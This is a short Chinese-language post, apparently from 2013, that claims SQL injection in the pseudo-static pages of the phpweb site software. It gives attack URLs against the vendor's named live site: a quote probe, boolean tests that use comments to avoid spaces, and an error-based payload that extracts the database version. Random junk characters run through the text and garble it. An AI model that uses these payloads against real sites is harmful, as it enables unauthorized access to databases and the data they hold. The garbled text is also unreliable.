phpweb所有的整站程序伪静态页面都存在sql注入2 T! c/ ]! L! S6 A! d
! F+ e/ s1 V+ F; s$ \主站:http://phpweb.net/
3 a& W" p& G: ~, d$ |加’检测:
6 B; D7 x7 Q; C# P) N! g/ L 8 d P& T8 ?4 c8 l4 O# B
http://www.phpweb.net/down/html/?772′.html
0 T) G7 |1 L5 M E
z6 M3 T+ M" H7 [. ]出错/ Q8 G" w9 Z' O. l
存在注入。
/ }1 [; l. F+ Q' E不能用空格,只能用/*罗7 U! C$ ~, a r1 E# }
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常. T0 J: V; w0 J6 R6 q# U3 d E
" w# D" t) ]0 M9 [http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
3 M; J, c- _2 l E/ u' ^# ~6 A爆数据库版本:
! w9 E# K3 F' l) h! X3 T . [0 n- ] o5 Q# W, u8 q9 P
?8 p/ [, Y% e' Y# x1 J0 L+ [- `
1
- M9 ~, c1 e' Shttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
6 _1 l o- h0 X更新日期: 2013-01-03 13:39:50
. ]1 [" d: r; s4 t, D0 Y |